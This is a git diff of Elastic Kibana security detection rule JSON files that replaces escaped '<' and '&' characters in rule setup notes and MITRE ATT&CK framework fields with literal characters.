a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json index d2af8e9da4d..cfcb8725b10 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json 
@@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json index f09b801ba0d..d43ee18124b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json 
@@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json index 3be6e13b8b8..4b0bf7a8569 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json 
@@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json index c78f0dccd52..19a1b7b750f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json 
@@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json index 252591f9f69..26a77b387fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json index a65c4181583..e9b09d3aca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json index 3f637a20336..81c0ed9b57f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json index 0def32d3735..601c5c50184 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json index b76c492354e..1cc32aa54ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json 
@@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json index 732f7a2a28c..6e73361df73 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json 
@@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json index 637c62b91ef..1f9308c8b14 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json 
@@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json index f0a1f9bc06a..d811421ce36 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json 
@@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json index a028268a055..689fd53b785 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json index 71e4c99670a..53ae01226bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json index 215a4b8794a..4681ca76bf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json index 4704e1e19cf..0ac669b419c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json index 1ccf1443df8..4dafd68432a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json index 1263398d7e1..2f0832e6115 100644 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json index 01e372c35eb..e1f9bc93f97 100644 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json index c782d6729f1..95cce9adcc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json index 5fb62d01722..98696664aef 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json 
@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json index 94811c3038a..29827bc2f95 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json index 23e9fa6e351..50d1c1aa3a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json index b15618c7e34..2d0b8943fbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json 
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json index 1a4fe70ae64..2475d20af0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json index ad5141de31d..cf14e8aa1d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json index 357c2c3220e..b78a4e3190d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json 
